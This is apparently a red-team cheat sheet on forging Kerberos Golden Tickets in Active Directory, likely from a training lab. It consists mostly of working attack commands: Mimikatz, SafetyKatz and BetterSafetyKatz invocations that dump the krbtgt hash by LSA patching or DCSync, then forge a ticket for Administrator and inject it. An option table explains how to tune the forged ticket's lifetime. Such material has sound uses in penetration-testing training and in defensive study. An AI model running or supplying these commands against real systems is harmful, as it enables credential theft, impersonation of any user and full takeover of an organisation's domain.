## Golden Ticket

A Golden Ticket is a forged Kerberos TGT that is signed and encrypted with the key of the krbtgt account (its NTLM hash or AES key), which makes the domain accept it as a valid TGT. Because the forger controls the contents of the ticket, a Golden Ticket can be used to impersonate any user with any privileges.
## Obtain the krbtgt hash

There are multiple ways to get the krbtgt account hash or AES key:

```
# Execute on the DC as Domain Admin
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

```
# DCSync to get the AES keys of the krbtgt account
# Needs Domain Admin or replication rights
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```
## Create the ticket

```
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<domain_sid> /aes256:<aes_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
dir \\dcorp-dc\c$   # check whether the injected ticket grants access
```
| Option | Meaning |
| --- | --- |
| `kerberos::golden` | Name of the module |
| `/User:Administrator` | Username for which the TGT is generated |
| `/domain:` | Domain FQDN |
| `/sid:` | SID of the domain |
| `/aes256:` | AES256 key of the krbtgt account |
| `/id:500 /groups:512` | Optional user RID and group RIDs |
| `/ptt` or `/ticket` | `ptt`: inject the ticket into the current process; `ticket`: save the ticket to a file |
| `/startoffset:0` | Optional offset of the ticket start time, in minutes. Use a negative value for a ticket valid from a time in the past and a larger positive value for one valid from the future. |
| `/endin:600` | Optional ticket lifetime in minutes (default 10 years). The default AD setting is 10 hours = 600 minutes. |
| `/renewmax:10080` | Optional maximum ticket lifetime with renewal, in minutes (default 10 years). The default AD setting is 7 days = 10080 minutes. |